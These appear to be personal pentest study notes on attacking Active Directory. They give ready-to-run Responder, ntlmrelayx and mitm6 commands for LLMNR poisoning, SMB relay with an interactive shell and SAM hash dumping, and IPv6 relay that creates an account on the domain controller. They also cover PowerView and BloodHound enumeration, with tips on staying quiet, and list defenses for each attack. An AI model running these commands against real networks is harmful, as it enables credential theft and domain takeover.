
=======================================================================================
=======================================================================================
=======================================================================================

                             Active Directory Attacks

=======================================================================================
=======================================================================================
=======================================================================================
  These things are best done at busy times where people are sending lots of requests.
=======================================================================================

    Attacking AD:
        1. Run mitm6 or responder at the beginning of the day.
        2. Run scans.
        3. Run scans on http with http_version (metasploit) to be quiet.
        4. Look for default credentials.
        5. Think outside the box.


    LLMNR Poisoning- Link Local Multicast Name Resolution
    
    When a DNS on a server fails on a domain controller/server, the server may let out a broadcast to try and resolve the DNS that is requested. While the broadcast
    happens, we can listen using something like Responder and catch the request and instead obtain the hashes of the username and password, which is always
    sent in an LLMNR broadcast.

    We can try to capture credentials sent in LLMNR/NBT-NS/DNS packets by using responder:
        "responder -I eth0 -rdwv"

=======================================================================================

    SMB Relay Attack
    
    *** IMPORTANT ***
    *** SMB SIGNING MUST BE DISABLED ***
    *** USER BEING RELAYED MUST BE AN ADMIN ***
    
    When we receive a hashed password/username from a target and aim to use it on a SMB (by relaying to it) we can impersonate them. We can do this by 
    using ntlxrelayx.py (in impacket). 
    
    An easy way to check if an smb fileshare port is vulnerable to an SMB relay attack is the use the nmap command:
        
        "nmap --script=smb2-security-mode.nse -p445 <target IP>/24"
    
    Bouncing the hashed credentials will involve these commands:
        
        1. Responder to catch the broadcast:
              "responder -I eth0 -rdwv"
                  * Make sure to turn off SMB server off and HTTP server off as well, for some unknown reason.
    
        2. Then, ntlxrelayx.py to relay the responder info received:
              "ntlmrelayx.py -tf targets.txt -smb2support [i]" (adding i will make it and interactive shell rather than just get hashes.)
                * The targets should be any other computer, preferrably where the credentials being sent will be admin.
    
        3. If successful, we will obtain the hashes from the SAM file on the unprotected active directory.
            * If interactive, use netcat to connect to the tcp port specified on the ntlm output.
            
    ***********************************

                Defenses

    ***********************************

    1. Disable NTLM authentication on network.

    2. Enable SMB signing on all devices.

    3. Local Administration restriction.


=======================================================================================

    IPv6 Attack

    The idea with a IPv6 attack is that no one is authenticating IPv6 addresses. Because of this, we can catch
    the IPv6 info (which will be in the NTLM form [hashes]) and then we can relay the info to the Domain Controller.

    It is the most useful when someone tries to authenticate, and we
    pass the NTLM data and use mitm6 to create our own account on the
    DC.

    Commands:
        1. "mitm6 -d xxxx.local"
            - This will allows us to spoof as a fake IPv6 address on the DC.

        2. "ntlmrelayx.py -6 -t ldaps://<DC IP> -wh fakewpad.<DC Domain> -l lootme"
            - This will relay the info to the DC and try to authenticate.
            - Along with access, it will enumerate tons of information.


    ***********************************

                Defenses

    ***********************************

    1. Disable IPv6

    2. Enable LDAPS and LDAP signing and channel binding

    3. Mark Admins as Protected Users, as this will disallow delegationg attacks.


=======================================================================================
=======================================================================================

                        Post Comprimise Enumeration

=======================================================================================
=======================================================================================

    PowerView:
        Powershell Commands (after running "powershell -ep bypass"):
        **PowerView Upload**
        - Get-NetDomain
        - Get-NetDomainController
        - Get-DomainPolicy
        - (Get-DomainPolicy)."system access"
        - Get-NetUser [| select [cn, samaccountname, etc] ]
        - Get-NetGroupMember 
        - Invoke-ShareFinder
        - Get-NetGPO 

    BloodHound:
        - First, you need to upload SharpHound.ps1 on the machine.
        - Then run:
            "Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip"
        - You then need to copy the data to another machine (I don't know which yet)

